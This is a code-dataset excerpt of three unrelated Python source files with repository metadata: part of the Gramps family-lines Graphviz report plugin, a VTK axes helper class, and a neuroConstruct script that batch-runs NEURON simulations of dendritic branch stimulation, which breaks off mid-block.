add_option('incprivate', include_private)
self.limit_changed()
self.images_changed()
def limit_changed(self):
"""
Handle the change of limiting parents and children.
"""
self.max_parents.set_available(self.limit_parents.get_value())
self.max_children.set_available(self.limit_children.get_value())
def images_changed(self):
"""
Handle the change of including images.
"""
self.image_location.set_available(self.include_images.get_value())
def include_dates_changed(self):
"""
Enable/disable menu items if dates are required
"""
if self.include_dates.get_value():
self.justyears.set_available(True)
else:
self.justyears.set_available(False)
#------------------------------------------------------------------------
#
# FamilyLinesReport -- created once the user presses 'OK'
#
#------------------------------------------------------------------------
class FamilyLinesReport(Report):
def __init__(self, database, options, user):
"""
Create FamilyLinesReport object that eventually produces the report.
The arguments are:
database - the GRAMPS database instance
options - instance of the FamilyLinesOptions class for this report
user - a gen.user.User() instance
"""
Report.__init__(self, database, options, user)
# initialize several convenient variables
self._db = database
self._people = set() # handle of people we need in the report
self._families = set() # handle of families we need in the report
self._deleted_people = 0
self._deleted_families = 0
self._user = user
menu = options.menu
get_option_by_name = menu.get_option_by_name
get_value = lambda name: get_option_by_name(name).get_value()
self._followpar = get_value('followpar')
self._followchild = get_value('followchild')
self._removeextra = get_value('removeextra')
self._gidlist = get_value('gidlist')
self._colormales = get_value('colormales')
self._colorfemales = get_value('colorfemales')
self._colorunknown = get_value('colorunknown')
self._colorfamilies = get_value('colorfamilies')
self._limitparents = get_value('limitparents')
self._maxparents = get_value('maxparents')
self._limitchildren = get_value('limitchildren')
self._maxchildren = get_value('maxchildren')
self._incimages = get_value('incimages')
self._imageonside = get_value('imageonside')
self._useroundedcorners = get_value('useroundedcorners')
self._usesubgraphs = get_value('usesubgraphs')
self._incdates = get_value('incdates')
self._just_years = get_value('justyears')
self._incplaces = get_value('incplaces')
self._incchildcount = get_value('incchildcnt')
self._incprivate = get_value('incprivate')
# the gidlist is annoying for us to use since we always have to convert
# the GIDs to either Person or to handles, so we may as well convert the
# entire list right now and not have to deal with it ever again
self._interest_set = set()
if not self._gidlist:
self._user.warn(_('Empty report'),
_('You did not specify anybody'))
for gid in self._gidlist.split():
person = self._db.get_person_from_gramps_id(gid)
if person:
#option can be from another family tree, so person can be None
self._interest_set.add(person.get_handle())
# convert the 'surnamecolors' string to a dictionary of names and colors
self._surnamecolors = {}
tmp = get_value('surnamecolors')
if (tmp.find('\xb0') >= 0):
tmp = tmp.split('\xb0') # new style delimiter (see bug report #2162)
else:
tmp = tmp.split(' ') # old style delimiter
while len(tmp) > 1:
surname = tmp.pop(0).encode('iso-8859-1', 'xmlcharrefreplace')
colour = tmp.pop(0)
self._surnamecolors[surname] = colour
self._colorize = get_value('color')
def begin_report(self):
"""
Inherited method; called by report() in _ReportDialog.py
This is where we'll do all of the work of figuring out who
from the database is going to be output into the report
"""
# starting with the people of interest, we then add parents:
self._people.clear()
self._families.clear()
if self._followpar:
self.findParents()
if self._removeextra:
self.removeUninterestingParents()
# ...and/or with the people of interest we add their children:
if self._followchild:
self.findChildren()
# once we get here we have a full list of people
# and families that we need to generate a report
def write_report(self):
"""
Inherited method; called by report() in _ReportDialog.py
"""
# now that begin_report() has done the work, output what we've
# obtained into whatever file or format the user expects to use
self.doc.add_comment('# Number of people in database: %d'
% self._db.get_number_of_people())
self.doc.add_comment('# Number of people of interest: %d'
% len(self._people))
self.doc.add_comment('# Number of families in database: %d'
% self._db.get_number_of_families())
self.doc.add_comment('# Number of families of interest: %d'
% len(self._families))
if self._removeextra:
self.doc.add_comment('# Additional people removed: %d'
% self._deleted_people)
self.doc.add_comment('# Additional families removed: %d'
% self._deleted_families)
self.doc.add_comment('# Initial list of people of interest:')
for handle in self._interest_set:
person = self._db.get_person_from_handle(handle)
gid = person.get_gramps_id()
name = person.get_primary_name().get_regular_name()
self.doc.add_comment('# -> %s, %s' % (gid, name))
self.writePeople()
self.writeFamilies()
def findParents(self):
# we need to start with all of our "people of interest"
ancestorsNotYetProcessed = set(self._interest_set)
# now we find all the immediate ancestors of our people of interest
while ancestorsNotYetProcessed:
handle = ancestorsNotYetProcessed.pop()
# One of 2 things can happen here:
# 1) we've already know about this person and he/she is already
# in our list
# 2) this is someone new, and we need to remember him/her
#
# In the first case, there isn't anything else to do, so we simply
# go back to the top and pop the next person off the list.
#
# In the second case, we need to add this person to our list, and
# then go through all of the parents this person has to find more
# people of interest.
if handle not in self._people:
person = self._db.get_person_from_handle(handle)
# if this is a private record, and we're not
# including private records, then go back to the
# top of the while loop to get the next person
if person.private and not self._incprivate:
continue
# remember this person!
self._people.add(handle)
# see if a family exists between this person and someone else
# we have on our list of people we're going to output -- if
# there is a family, then remember it for when it comes time
# to link spouses together
for family_handle in person.get_family_handle_list():
family = self._db.get_family_from_handle(family_handle)
spouse_handle = ReportUtils.find_spouse(person, family)
if spouse_handle:
if (spouse_handle in self._people or
spouse_handle in ancestorsNotYetProcessed):
self._families.add(family_handle)
# if we have a limit on the number of people, and we've
# reached that limit, then don't attempt to find any
# more ancestors
if self._limitparents and (self._maxparents <
len(ancestorsNotYetProcessed) + len(self._people)):
# get back to the top of the while loop so we can finish
# processing the people queued up in the "not yet
# processed" list
continue
# queue the parents of the person we're processing
for family_handle in person.get_parent_family_handle_list():
family = self._db.get_family_from_handle(family_handle)
if not family.private or self._incprivate:
father = self._db.get_person_from_handle(
family.get_father_handle())
mother = self._db.get_person_from_handle(
family.get_mother_handle())
if father:
if not father.private or self._incprivate:
ancestorsNotYetProcessed.add(
family.get_father_handle())
self._families.add(family_handle)
if mother:
if not mother.private or self._incprivate:
ancestorsNotYetProcessed.add(
family.get_mother_handle())
self._families.add(family_handle)
def removeUninterestingParents(self):
# start with all the people we've already identified
unprocessed_parents = set(self._people)
while len(unprocessed_parents) > 0:
handle = unprocessed_parents.pop()
person = self._db.get_person_from_handle(handle)
# There are a few things we're going to need,
# so look it all up right now; such as:
# - who is the child?
# - how many children?
# - parents?
# - spouse?
# - is a person of interest?
# - spouse of a person of interest?
# - same surname as a person of interest?
# - spouse has the same surname as a person of interest?
child_handle = None
child_count = 0
spouse_handle = None
spouse_count = 0
father_handle = None
mother_handle = None
spouse_father_handle = None
spouse_mother_handle = None
spouse_surname = ""
surname = person.get_primary_name().get_surname()
surname = surname.encode('iso-8859-1','xmlcharrefreplace')
# first we get the person's father and mother
for family_handle in person.get_parent_family_handle_list():
family = self._db.get_family_from_handle(family_handle)
handle = family.get_father_handle()
if handle in self._people:
father_handle = handle
handle = family.get_mother_handle()
if handle in self._people:
mother_handle = handle
# now see how many spouses this person has
for family_handle in person.get_family_handle_list():
family = self._db.get_family_from_handle(family_handle)
handle = ReportUtils.find_spouse(person, family)
if handle in self._people:
spouse_count += 1
spouse = self._db.get_person_from_handle(handle)
spouse_handle = handle
spouse_surname = spouse.get_primary_name().get_surname()
spouse_surname = spouse_surname.encode(
'iso-8859-1', 'xmlcharrefreplace'
)
# see if the spouse has parents
if not spouse_father_handle and not spouse_mother_handle:
for family_handle in \
spouse.get_parent_family_handle_list():
family = self._db.get_family_from_handle(
family_handle)
handle = family.get_father_handle()
if handle in self._people:
spouse_father_handle = handle
handle = family.get_mother_handle()
if handle in self._people:
spouse_mother_handle = handle
# get the number of children that we think might be interesting
for family_handle in person.get_family_handle_list():
family = self._db.get_family_from_handle(family_handle)
for child_ref in family.get_child_ref_list():
if child_ref.ref in self._people:
child_count += 1
child_handle = child_ref.ref
# we now have everything we need -- start looking for reasons
# why this is a person we need to keep in our list, and loop
# back to the top as soon as a reason is discovered
# if this person has many children of interest, then we
# automatically keep this person
if child_count > 1:
continue
# if this person has many spouses of interest, then we
# automatically keep this person
if spouse_count > 1:
continue
# if this person has parents, then we automatically keep
# this person
if father_handle is not None or mother_handle is not None:
continue
# if the spouse has parents, then we automatically keep
# this person
if spouse_father_handle is not None or spouse_mother_handle is not None:
continue
# if this is a person of interest, then we automatically keep
if person.get_handle() in self._interest_set:
continue
# if the spouse is a person of interest, then we keep
if spouse_handle in self._interest_set:
continue
# if the surname (or the spouse's surname) matches a person
# of interest, then we automatically keep this person
bKeepThisPerson = False
for personOfInterestHandle in self._interest_set:
personOfInterest = self._db.get_person_from_handle(personOfInterestHandle)
surnameOfInterest = personOfInterest.get_primary_name().get_surname().encode('iso-8859-1','xmlcharrefreplace')
if surnameOfInterest == surname or surnameOfInterest == spouse_surname:
bKeepThisPerson = True
break
if bKeepThisPerson:
continue
# if we have a special colour to use for this person,
# then we automatically keep this person
if surname in self._surnamecolors:
continue
# if we have a special colour to use for the spouse,
# then we automatically keep this person
if spouse_surname in self._surnamecolors:
continue
# took us a while, but if we get here, then we can remove this person
self._deleted_people += 1
self._people.remove(person.get_handle())
# we can also remove any families to which this person belonged
for family_handle in person.get_family_handle_list():
if family_handle in self._families:
self._deleted_families += 1
self._families.remove(family_handle)
# if we have a spouse, then ensure we queue up the spouse
if spouse_handle:
if spouse_handle not in unprocessed_parents:
unprocessed_parents.add(spouse_handle)
# if we have a child, then ensure we queue up the child
if child_handle:
if child_handle not in unprocessed_parents:
unprocessed_parents.add(child_handle)
def findChildren(self):
# we need to start with all of our "people of interest"
childrenNotYetProcessed = set(self._interest_set)
childrenToInclude = set()
# now we find all the children of our people of interest
while len(childrenNotYetProcessed) > 0:
handle = childrenNotYetProcessed.pop()
if handle not in childrenToInclude:
person = self._db.get_person_from_handle(handle)
# if this is a private record, and we're not
# including private records, then go back to the
# top of the while loop to get the next person
if person.private and not self._incprivate:
continue
# remember this person!
childrenToInclude.add(handle)
# if we have a limit on the number of people, and we've
# reached that limit, then don't attempt to find any
# more children
if self._limitchildren and (
self._maxchildren < (
len(childrenNotYetProcessed) + len(childrenToInclude)
)
):
# get back to the top of the while loop so we can finish
# processing the people queued up in the "not yet processed" list
continue
# iterate through this person's families
for family_handle in person.get_family_handle_list():
family = self._db.get_family_from_handle(family_handle)
if (family.private and self._incprivate) or not family.private:
# queue up any children from this person's family
for childRef in family.get_child_ref_list():
child = self._db.get_person_from_handle(childRef.ref)
if (child.private and self._incprivate) or not child.private:
childrenNotYetProcessed.add(child.get_handle())
self._families.add(family_handle)
# include the spouse from this person's family
spouse_handle = ReportUtils.find_spouse(person, family)
if spouse_handle:
spouse = self._db.get_person_from_handle(spouse_handle)
if (spouse.private and self._incprivate) or not spouse.private:
childrenToInclude.add(spouse_handle)
self._families.add(family_handle)
# we now merge our temp set "childrenToInclude" into our master set
self._people.update(childrenToInclude)
def writePeople(self):
self.doc.add_comment('')
# If we're going to attempt to include images, then use the HTML style
# of .gv file.
bUseHtmlOutput = False
if self._incimages:
bUseHtmlOutput = True
# loop through all the people we need to output
for handle in self._people:
person = self._db.get_person_from_handle(handle)
name = name_displayer.display_name(person.get_primary_name())
# figure out what colour to use
gender = person.get_gender()
colour = self._colorunknown
if gender == Person.MALE:
colour = self._colormales
elif gender == Person.FEMALE:
colour = self._colorfemales
# see if we have surname colours that match this person
surname = person.get_primary_name().get_surname().encode('iso-8859-1','xmlcharrefreplace')
if surname in self._surnamecolors:
colour = self._surnamecolors[surname]
# see if we have a birth/death or fallback dates we can use
if self._incdates or self._incplaces:
bth_event = get_birth_or_fallback(self._db, person)
dth_event = get_death_or_fallback(self._db, person)
else:
bth_event = None
dth_event = None
# output the birth or fallback event
birthStr = None
if bth_event and self._incdates:
if not bth_event.private or self._incprivate:
date = bth_event.get_date_object()
if self._just_years and date.get_year_valid():
birthStr = '%i' % date.get_year()
else:
birthStr = _dd.display(date)
# get birth place (one of: city, state, or country) we can use
birthplace = None
if bth_event and self._incplaces:
if not bth_event.private or self._incprivate:
place = self._db.get_place_from_handle(bth_event.get_place_handle())
if place:
location = place.get_main_location()
if location.get_city:
birthplace = location.get_city()
elif location.get_state:
birthplace = location.get_state()
elif location.get_country:
birthplace = location.get_country()
# see if we have a deceased date we can use
deathStr = None
if dth_event and self._incdates:
if not dth_event.private or self._incprivate:
date = dth_event.get_date_object()
if self._just_years and date.get_year_valid():
deathStr = '%i' % date.get_year()
else:
deathStr = _dd.display(date)
# get death place (one of: city, state, or country) we can use
deathplace = None
if dth_event and self._incplaces:
if not dth_event.private or self._incprivate:
place = self._db.get_place_from_handle(dth_event.get_place_handle())
if place:
location = place.get_main_location()
if location.get_city:
deathplace = location.get_city()
elif location.get_state:
deathplace = location.get_state()
elif location.get_country:
deathplace = location.get_country()
# see if we have an image to use for this person
imagePath = None
if self._incimages:
mediaList = person.get_media_list()
if len(mediaList) > 0:
mediaHandle = mediaList[0].get_reference_handle()
media = self._db.get_object_from_handle(mediaHandle)
mediaMimeType = media.get_mime_type()
if mediaMimeType[0:5] == "image":
imagePath = get_thumbnail_path(
media_path_full(self._db,
media.get_path()),
rectangle=mediaList[0].get_rectangle())
# put the label together and output this person
label = ""
lineDelimiter = '\\n'
if bUseHtmlOutput:
lineDelimiter = '<BR/>'
# if we have an image, then start an HTML table; remember to close the table afterwards!
if imagePath:
label = ('<TABLE BORDER="0" CELLSPACING="2" CELLPADDING="0" '
'CELLBORDER="0"><TR><TD><IMG SRC="%s"/></TD>'
% imagePath
)
if self._imageonside == 0:
label += '</TR><TR>'
label += '<TD>'
# at the very least, the label must have the person's name
label += name
if birthStr or deathStr:
label += ' %s(' % lineDelimiter
if birthStr:
label += '%s' % birthStr
label += ' - '
if deathStr:
label += '%s' % deathStr
label += ')'
if birthplace or deathplace:
if birthplace == deathplace:
deathplace = None # no need to print the same name twice
label += ' %s' % lineDelimiter
if birthplace:
label += '%s' % birthplace
if birthplace and deathplace:
label += ' / '
if deathplace:
label += '%s' % deathplace
# see if we have a table that needs to be terminated
if imagePath:
label += '</TD></TR></TABLE>'
shape = "box"
style = "solid"
border = colour
fill = colour
# do not use colour if this is B&W outline
if self._colorize == 'outline':
border = ""
fill = ""
if gender == person.FEMALE and self._useroundedcorners:
style = "rounded"
elif gender == person.UNKNOWN:
shape = "hexagon"
# if we're filling the entire node:
if self._colorize == 'filled':
style += ",filled"
border = ""
# we're done -- add the node
self.doc.add_node(person.get_gramps_id(),
label=label,
shape=shape,
color=border,
style=style,
fillcolor=fill,
htmloutput=bUseHtmlOutput)
def writeFamilies(self):
self.doc.add_comment('')
# loop through all the families we need to output
for family_handle in self._families:
family = self._db.get_family_from_handle(family_handle)
fgid = family.get_gramps_id()
# figure out a wedding date or placename we can use
weddingDate = None
weddingPlace = None
if self._incdates or self._incplaces:
for event_ref in family.get_event_ref_list():
event = self._db.get_event_from_handle(event_ref.ref)
if event.get_type() == EventType.MARRIAGE and \
(event_ref.get_role() == EventRoleType.FAMILY or
event_ref.get_role() == EventRoleType.PRIMARY ):
# get the wedding date
if (event.private and self._incprivate) or not event.private:
if self._incdates:
date = event.get_date_object()
if self._just_years and date.get_year_valid():
weddingDate = '%i' % date.get_year()
else:
weddingDate = _dd.display(date)
# get the wedding location
if self._incplaces:
place = self._db.get_place_from_handle(event.get_place_handle())
if place:
location = place.get_main_location()
if location.get_city:
weddingPlace = location.get_city()
elif location.get_state:
weddingPlace = location.get_state()
elif location.get_country:
weddingPlace = location.get_country()
break
# figure out the number of children (if any)
childrenStr = None
if self._incchildcount:
child_count = len(family.get_child_ref_list())
# if child_count == 1:
# childrenStr = _('1 child')
if child_count > 1:
childrenStr = _('%d children') % child_count
label = ''
if weddingDate:
if label != '':
label += '\\n'
label += '%s' % weddingDate
if weddingPlace:
if label != '':
label += '\\n'
label += '%s' % weddingPlace
if childrenStr:
if label != '':
label += '\\n'
label += '%s' % childrenStr
shape = "ellipse"
style = "solid"
border = self._colorfamilies
fill = self._colorfamilies
# do not use colour if this is B&W outline
if self._colorize == 'outline':
border = ""
fill = ""
# if we're filling the entire node:
if self._colorize == 'filled':
style += ",filled"
border = ""
# we're done -- add the node
self.doc.add_node(fgid, label, shape, border, style, fill)
# now that we have the families written, go ahead and link the parents and children to the families
for family_handle in self._families:
# get the parents for this family
family = self._db.get_family_from_handle(family_handle)
fgid = family.get_gramps_id()
father_handle = family.get_father_handle()
mother_handle = family.get_mother_handle()
self.doc.add_comment('')
if self._usesubgraphs and father_handle and mother_handle:
self.doc.start_subgraph(fgid)
# see if we have a father to link to this family
if father_handle:
if father_handle in self._people:
father = self._db.get_person_from_handle(father_handle)
comment = "father: %s" % father.get_primary_name().get_regular_name()
self.doc.add_link(father.get_gramps_id(), fgid, comment=comment)
# see if we have a mother to link to this family
if mother_handle:
if mother_handle in self._people:
mother = self._db.get_person_from_handle(mother_handle)
comment = "mother: %s" % mother.get_primary_name().get_regular_name()
self.doc.add_link(mother.get_gramps_id(), fgid, comment=comment)
if self._usesubgraphs and father_handle and mother_handle:
self.doc.end_subgraph()
# link the children to the family
for childRef in family.get_child_ref_list():
if childRef.ref in self._people:
child = self._db.get_person_from_handle(childRef.ref)
comment = "child: %s" % child.get_primary_name().get_regular_name()
self.doc.add_link(fgid, child.get_gramps_id(), comment=comment)
|
Forage/Gramps
|
gramps/plugins/graph/gvfamilylines.py
|
Python
|
gpl-2.0
| 43,919
|
[
"Brian"
] |
fd9ae781a495bd6fbae20b9c26101e89f39c013f294c90f5f4836fa8ed408465
|
'''
Created on Aug 5, 2014
@author: gearsad
'''
import vtk
from SceneObject import SceneObject
class Axes(SceneObject):
'''
A template for drawing axes.
Shouldn't really be in a class of it's own, but it's cleaner here and like this we can move it easily.
Ref: http://vtk.org/gitweb?p=VTK.git;a=blob;f=Examples/GUI/Tcl/ProbeWithSplineWidget.tcl
'''
def __init__(self, renderer):
'''
Initialize the axes - not the parent version, we're going to assign a vtkAxesActor to it and add it ourselves.
'''
# Skip the parent constructor
#super(Axes,self).__init__(renderer)
# Ref: http://vtk.org/gitweb?p=VTK.git;a=blob;f=Examples/GUI/Tcl/ProbeWithSplineWidget.tcl
self.vtkActor = vtk.vtkAxesActor()
self.vtkActor.SetShaftTypeToCylinder()
self.vtkActor.SetCylinderRadius(0.05)
self.vtkActor.SetTotalLength(2.5, 2.5, 2.5)
# Change the font size to something reasonable
# Ref: http://vtk.1045678.n5.nabble.com/VtkAxesActor-Problem-td4311250.html
self.vtkActor.GetXAxisCaptionActor2D().GetTextActor().SetTextScaleMode(vtk.vtkTextActor.TEXT_SCALE_MODE_NONE)
self.vtkActor.GetXAxisCaptionActor2D().GetTextActor().GetTextProperty().SetFontSize(25);
self.vtkActor.GetYAxisCaptionActor2D().GetTextActor().SetTextScaleMode(vtk.vtkTextActor.TEXT_SCALE_MODE_NONE)
self.vtkActor.GetYAxisCaptionActor2D().GetTextActor().GetTextProperty().SetFontSize(25);
self.vtkActor.GetZAxisCaptionActor2D().GetTextActor().SetTextScaleMode(vtk.vtkTextActor.TEXT_SCALE_MODE_NONE)
self.vtkActor.GetZAxisCaptionActor2D().GetTextActor().GetTextProperty().SetFontSize(25);
# Add the actor.
renderer.AddActor(self.vtkActor)
|
GearsAD/semisorted_arnerve
|
sandbox/bot_vis_platform_post3b/scene/Axes.py
|
Python
|
mit
| 1,801
|
[
"VTK"
] |
b52e980e822cec5eb7cdb46f57e267c7882556f19370d43d28675d52d3bd86e1
|
#
# A file that opens the neuroConstruct project LarkumEtAl2009 and run multiple simulations stimulating ech terminal apical branch with varying number of synapses.
#
# Author: Matteo Farinella
from sys import *
from java.io import File
from java.lang import System
from java.util import ArrayList
from ucl.physiol.neuroconstruct.project import ProjectManager
from ucl.physiol.neuroconstruct.neuron import NeuronFileManager
from ucl.physiol.neuroconstruct.utils import NumberGenerator
from ucl.physiol.neuroconstruct.nmodleditor.processes import ProcessManager
from ucl.physiol.neuroconstruct.simulation import SimulationData
from ucl.physiol.neuroconstruct.gui import SimulationRerunFrame
from ucl.physiol.neuroconstruct.gui.plotter import PlotManager
from ucl.physiol.neuroconstruct.gui.plotter import PlotCanvas
from ucl.physiol.neuroconstruct.dataset import DataSet
from math import *
import time
import shutil
import random
import os
import subprocess
# Load the original project
projName = "LarkumEtAl2009"
projFile = File("/home/matteo/neuroConstruct/models/"+projName+"/"+projName+".ncx")
print "Loading project from file: " + projFile.getAbsolutePath()+", exists: "+ str(projFile.exists())
pm = ProjectManager()
myProject = pm.loadProject(projFile)
simConfig = myProject.simConfigInfo.getSimConfig("Default Simulation Configuration")#
randomseed = random.randint(1000,5000)
pm.doGenerate(simConfig.getName(), randomseed)
while pm.isGenerating():
print "Waiting for the project to be generated..."
time.sleep(2)
numGenerated = myProject.generatedCellPositions.getNumberInAllCellGroups()
simsRunning = []
def updateSimsRunning():
simsFinished = []
for sim in simsRunning:
timeFile = File(myProject.getProjectMainDirectory(), "simulations/"+sim+"/time.dat")
#print "Checking file: "+timeFile.getAbsolutePath() +", exists: "+ str(timeFile.exists())
if (timeFile.exists()):
simsFinished.append(sim)
if(len(simsFinished)>0):
for sim in simsFinished:
simsRunning.remove(sim)
if numGenerated > 0:
print "Generating NEURON scripts..."
myProject.neuronFileManager.setQuitAfterRun(1) # Remove this line to leave the NEURON sim windows open after finishing
myProject.neuronSettings.setCopySimFiles(1) # 1 copies hoc/mod files to PySim_0 etc. and will allow multiple sims to run at once
myProject.neuronSettings.setGraphicsMode(False) # Run NEURON without GUI
# Note same network structure will be used for each!
# Change this number to the number of processors you wish to use on your local machine
maxNumSimultaneousSims = 100
#multiple simulation settings:
prefix = "" #string that will be added to the name of the simulations to identify the simulation set
trials = 100
Nbranches = 8
Configuration = ["NMDAspike input"]
apical_branch = ["apical17","apical18","apical21","apical23","apical24","apical25","apical27","apical28","apical31","apical34","apical35","apical37","apical38","apical44","apical46","apical52","apical53","apical54","apical56","apical57","apical61","apical62","apical65","apical67","apical68","apical69","apical72","apical73"]
apical_stim = ["NMDAs_17","NMDAs_18","NMDAs_21","NMDAs_23","NMDAs_24","NMDAs_25","NMDAs_27","NMDAs_28","NMDAs_31","NMDAs_34","NMDAs_35","NMDAs_37","NMDAs_38","NMDAs_44","NMDAs_46","NMDAs_52","NMDAs_53","NMDAs_54","NMDAs_56","NMDAs_57","NMDAs_61","NMDAs_62","NMDAs_65","NMDAs_67","NMDAs_68","NMDAs_69","NMDAs_72","NMDAs_73"]
apical_ID =[4460,4571,4793,4961,4994,5225,5477,5526,5990,6221,6274,6523,6542,6972,7462,8026,8044,8088,8324,8468,8685,8800,8966,9137,9160,9186,9592,9639]
apical_lenght = [98,69,78,26,34,166,161,49,143,55,87,25,38,73,194,19,22,26,25,129,138,95,42,89,21,62,26,18]
apical_plot = ["pyrCML_apical17_V","pyrCML_apical18_V","pyrCML_apical21_V","pyrCML_apical23_V","pyrCML_apical24_V","pyrCML_apical25_V","pyrCML_apical27_V","pyrCML_apical28_V","pyrCML_apical31_V","pyrCML_apical34_V","pyrCML_apical35_V","pyrCML_apical37_V","pyrCML_apical38_V","pyrCML_apical44_V","pyrCML_apical46_V","pyrCML_apical52_V","pyrCML_apical53_V","pyrCML_apical54_V","pyrCML_apical56_V","pyrCML_apical57_V","pyrCML_apical61_V","pyrCML_apical62_V","pyrCML_apical65_V","pyrCML_apical67_V","pyrCML_apical68_V","pyrCML_apical69_V","pyrCML_apical72_V","pyrCML_apical73_V"]
print "Going to run " +str(int(trials*Nbranches)) + " simulations"
refStored = []
simGroups = ArrayList()
simInputs = ArrayList()
simPlots = ArrayList()
stringConfig = Configuration[0]
print "nConstruct using SIMULATION CONFIGURATION: " +stringConfig
simConfig = myProject.simConfigInfo.getSimConfig(stringConfig)
for y in range(2, Nbranches):
j=y+1
selectedBranches = []
prefix = "b"+str(j) #number of branches stimulated
print
print "-----------------------------------------------------------------------"
print str(trials)+" trials, stimulating " +str(int(j))+" branches"
print "reference name: " + prefix +"..."
print "-----------------------------------------------------------------------"
print
for i in range(0, trials):
randomseed = random.randint(1000,5000)
print ""
selectedBranches = []
#empty vectors
simGroups = ArrayList()
simInputs = ArrayList()
simPlots = ArrayList()
######## Selecting j random different apical branches to Input and Plot ###############
for r in range(0,j):
randomApicalBranch = random.randint(0,int(len(apical_branch))-1)
while randomApicalBranch in selectedBranches:
randomApicalBranch = random.randint(0,int(len(apical_branch))-1)
selectedBranches.append(randomApicalBranch)
print "selected branch "+apical_branch[randomApicalBranch]
simInputs.add(apical_stim[randomApicalBranch])
simPlots.add(apical_plot[randomApicalBranch])
simGroups.add("pyrCML_group")
simPlots.add("pyrCML_soma_V")
simConfig.setCellGroups(simGroups)
simConfig.setInputs(simInputs)
simConfig.setPlots(simPlots)
print "group generated: "+simConfig.getCellGroups().toString()
print "going to stimulate: "+simConfig.getInputs().toString()
print "going to record: "+simConfig.getPlots().toString()
'''##########################################################################################
simRef = prefix+"control"+str(i)
print "Simref: "+simRef
myProject.simulationParameters.setReference(simRef)
refStored.append(simRef)
##### RUN BLOCK control #####
pm.doGenerate(simConfig.getName(), randomseed)
while pm.isGenerating():
print "Waiting for the project to be generated..."
time.sleep(2)
myProject.neuronFileManager.setSuggestedRemoteRunTime(10)
myProject.neuronFileManager.generateTheNeuronFiles(simConfig, None, NeuronFileManager.RUN_HOC, randomseed)
print "Generated NEURON files for: "+simRef
compileProcess = ProcessManager(myProject.neuronFileManager.getMainHocFile())
compileSuccess = compileProcess.compileFileWithNeuron(0,0)
print "Compiled NEURON files for: "+simRef
if compileSuccess:
pm.doRunNeuron(simConfig)
print "Set running simulation: "+simRef
time.sleep(5) # Wait for sim to be kicked off
#####################'''
'''######## Rerunning the same configuration + background exc ###############
simInputs.add("backgroundExc")
simConfig.setInputs(simInputs)
print "group generated: "+simConfig.getCellGroups().toString()
print "going to stimulate: "+simConfig.getInputs().toString()
print "going to record: "+simConfig.getPlots().toString()
##########################################################################################
simRef = prefix+"E1500_"+str(i)
print "Simref: "+simRef
myProject.simulationParameters.setReference(simRef)
refStored.append(simRef)
##### RUN BLOCK background exc #####
randomseed = random.randint(1000,5000)
pm.doGenerate(simConfig.getName(), randomseed)
while pm.isGenerating():
print "Waiting for the project to be generated..."
time.sleep(2)
myProject.neuronFileManager.setSuggestedRemoteRunTime(10)
myProject.neuronFileManager.generateTheNeuronFiles(simConfig, None, NeuronFileManager.RUN_HOC, randomseed)
print "Generated NEURON files for: "+simRef
compileProcess = ProcessManager(myProject.neuronFileManager.getMainHocFile())
compileSuccess = compileProcess.compileFileWithNeuron(0,0)
print "Compiled NEURON files for: "+simRef
if compileSuccess:
pm.doRunNeuron(simConfig)
print "Set running simulation: "+simRef
time.sleep(30) # Wait for sim to be kicked off
simInputs.remove("backgroundExc")
#####################'''
######## Rerunning the same configuration + background exc/inh ###############
simInputs.add("backgroundExc")
simInputs.add("backgroundInh")
simConfig.setInputs(simInputs)
print "group generated: "+simConfig.getCellGroups().toString()
print "going to stimulate: "+simConfig.getInputs().toString()
print "going to record: "+simConfig.getPlots().toString()
##########################################################################################
simRef = prefix+"E1500I43_"+str(i)
print "Simref: "+simRef
myProject.simulationParameters.setReference(simRef)
refStored.append(simRef)
'''##### RUN BLOCK background exc/inh #####
randomseed = random.randint(1000,5000)
pm.doGenerate(simConfig.getName(), randomseed)
while pm.isGenerating():
print "Waiting for the project to be generated..."
time.sleep(2)
myProject.neuronFileManager.setSuggestedRemoteRunTime(10)
myProject.neuronFileManager.generateTheNeuronFiles(simConfig, None, NeuronFileManager.RUN_HOC, randomseed)
print "Generated NEURON files for: "+simRef
compileProcess = ProcessManager(myProject.neuronFileManager.getMainHocFile())
compileSuccess = compileProcess.compileFileWithNeuron(0,0)
print "Compiled NEURON files for: "+simRef
if compileSuccess:
pm.doRunNeuron(simConfig)
print "Set running simulation: "+simRef
time.sleep(3) # Wait for sim to be kicked off
simInputs.remove("backgroundExc")
simInputs.remove("backgroundInh")
#####################'''
'''######## Rerunning the same configuration + background inh ###############
simInputs.add("backgroundInh")
simConfig.setInputs(simInputs)
print "group generated: "+simConfig.getCellGroups().toString()
print "going to stimulate: "+simConfig.getInputs().toString()
print "going to record: "+simConfig.getPlots().toString()
##########################################################################################
simRef = prefix+"I43"+str(i)
print "Simref: "+simRef
myProject.simulationParameters.setReference(simRef)
refStored.append(simRef)
##### RUN BLOCK background inh #####
randomseed = random.randint(1000,5000)
pm.doGenerate(simConfig.getName(), randomseed)
while pm.isGenerating():
print "Waiting for the project to be generated..."
time.sleep(2)
myProject.neuronFileManager.setSuggestedRemoteRunTime(10)
myProject.neuronFileManager.generateTheNeuronFiles(simConfig, None, NeuronFileManager.RUN_HOC, randomseed)
print "Generated NEURON files for: "+simRef
compileProcess = ProcessManager(myProject.neuronFileManager.getMainHocFile())
compileSuccess = compileProcess.compileFileWithNeuron(0,0)
print "Compiled NEURON files for: "+simRef
if compileSuccess:
pm.doRunNeuron(simConfig)
print "Set running simulation: "+simRef
time.sleep(30) # Wait for sim to be kicked off
#####################'''
### end for i (trials)
### end for j (noise)
######## Extracting simulations results ###############
time.sleep(10)
y=-1
for sim in refStored:
y=y+1
pullSimFilename = "pullsim.sh"
path = "/home/matteo/neuroConstruct/models/"+projName
print "\n------ Checking directory: " + path +"/simulations"+"/"+sim
pullsimFile = path+"/simulations/"+sim+"/"+pullSimFilename
if os.path.isfile(pullsimFile):
print pullSimFilename+" exists and will be executed..."
process = subprocess.Popen("cd "+path+"/simulations/"+sim+"/"+";./"+pullSimFilename, shell=True, stdout=subprocess.PIPE)
stdout_value = process.communicate()[0]
process.wait()
else:
print "Simulation not finished"
if os.path.isfile(path+"/simulations/"+sim+"/pyrCML_group_0.dat"):
print "Simulation results recovered from remote cluster."
simDir = File(path+"/simulations/"+sim)
newFileSoma = path+"/recordings/"+sim+".soma"
shutil.copyfile(path+"/simulations/"+sim+"/pyrCML_group_0.dat" , newFileSoma)
for ID in apical_ID:
if os.path.isfile(path+"/simulations/"+sim+"/pyrCML_group_0."+str(ID)+".dat"):
newFileApical = path+"/recordings/"+sim+"_ID"+str(ID)+".apical"
shutil.copyfile(path+"/simulations/"+sim+"/pyrCML_group_0."+str(ID)+".dat" , newFileApical)
print "Simulation was successful. "
print "Results saved."
print
else:
